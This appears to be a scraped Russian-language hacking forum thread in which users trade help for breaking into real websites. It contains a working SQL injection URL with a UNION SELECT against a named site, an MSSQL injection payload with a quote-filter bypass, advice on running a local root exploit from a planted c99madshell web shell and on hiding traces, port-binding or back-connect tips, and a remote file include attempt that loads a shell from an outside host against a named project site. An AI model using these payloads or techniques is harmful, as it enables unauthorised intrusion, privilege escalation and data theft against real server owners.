дело совсем в другом, а именно в самих правах доступа drw-r--r- к примеру.. есть статья в нашизх статьях, ищи.
Велемир, там надо лимитом пользоваться: Code: http://www.laptopshowcase.co.uk/suppliers.php?id=-1%20GROUP%20BY%20suppliers.id%20union%20select%201,2,name,4,5,6,7,8,9%20from%20suppliers%20limit%201,1/*
права доступа Спасибо, blackybr! Подскажите, как можно и через что получить в Linux доступ к файлам root/adm, которые открыты только для этого пользователя и закрыты для группы, если есть c99madshell с правами uid=33(www-data) gid=33(www-data) groups=33(www-data) ? Спасибо!
порутать Linux сервер Спасибо, blackybr! а порутать серв можно с помощью сплойта или ещё как? посоветуйте, что почитать можно по рутанью Linux сервера, если залит c99madshell?
запуск exploit на Linux Спасибо, Анжелик! Linux webserver2 2.6.15-26-server #1 SMP Aug 2006 i686 GNU/Linux Версию знаю, сплоит нашёл - http://www.milw0rm.com/exploits/2006 А если я его выполню в c99madshell через: gcc raptor_prctl.c -o raptor_prctl -Wall ./raptor_prctl то какой будет результат в итоге? у меня у c99madshell'a появятся права root на эту сессию, или навсегда? или ещё что? не запалит ли это меня, и как замести следы?
fervex тебе нужно забиндить порт или сбэкконектиться (желаетльно чтобы псевдотерминад поддердживался скриптом) и только потом запускать, так сказать интерактивно
Проблема в следующем, есть скуль, бд - mssql, на кавычку идет фильтр, пытаюсь вытянуть что-нибудь следующим запросом - http://www.xxx.com/number.asp?id=45509+or+1=(select+top+1+table_name+from+information_schema.columns+where+column_name=char(112,97,115,115,119,111,114,100)-- В ответ ошибка - The char function requires 1 arguments. Что не так, и как можно обойти ?
удобнее хексить, но и charить можно, только не как в мускуле, а каждый сисмвол в отдельную функцию соединяя плюсам, в гет запросах %2B: http://www.xxx.com/number.asp?id=45509+or+1=(select+top+1+table_name+ from+information_schema.columns+where+column_name= char(112)%2Bchar(97)%2Bchar(115) и т.д кстати ты перед -- скобку) пропустил
я обычно SIPT пользую так как стоит у меня, а вобще таких прог много: http://forum.antichat.ru/thread24918.html
Вопрос такой. Возможно ли определить наличие таблицы не используя union? То бишь я предполагаю, что в БД есть таблица, ну к примеру admin, можно ли определить есть такая таблица или нет? Заранее мерси всем ответившим.
www.ru/admin/ www.admin.site.ru/ www.ru/adm/ www.ru/administrator/ www.ru/pma/ www.ru/PhpMyAdmin/ ....
Есть инклуд на сайте,с раскрытием пути. http://rusxmms.sourceforge.net/index.php?page=home/groups/r/ru/rusxmms/htdocs/index.php Warning: main(gaga.php): failed to open stream: No such file or directory in /home/groups/r/ru/rusxmms/htdocs/index.php on line 39 Warning: main(): Failed opening 'gaga.php' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/r/ru/rusxmms/htdocs/index.php on line 39 Вопрос: Как определить, статическое значение здесь или переменное? (нубский вопрос,но инклуды я ещё ниразу не юзил:РР). И ещё- можно ли её эксплуатировать(залить шелл на хостинг и перенаправить), если там не работает запрос HTTP вида http://rusxmms.sourceforge.net/index.php?page=http://iadebilko.ru/padonag/shell.php .Выдаёт Access Denied! - аналогично, если в файл передавать различные символы). P.S. Пожалуйста, разъясните всё подробно - гайды читал,но многого не понял. Но это стопудо не глобальный инклудинг, ибо на GET- запросы ему тоже насрать - http://rusxmms.sourceforge.net/index.php?page=http://rambler.ru? В этом случае бы просто расширение .xxx, в данном случае - php, отбросилось бы как гет параметр и я бы перешёл на рембелр ру.
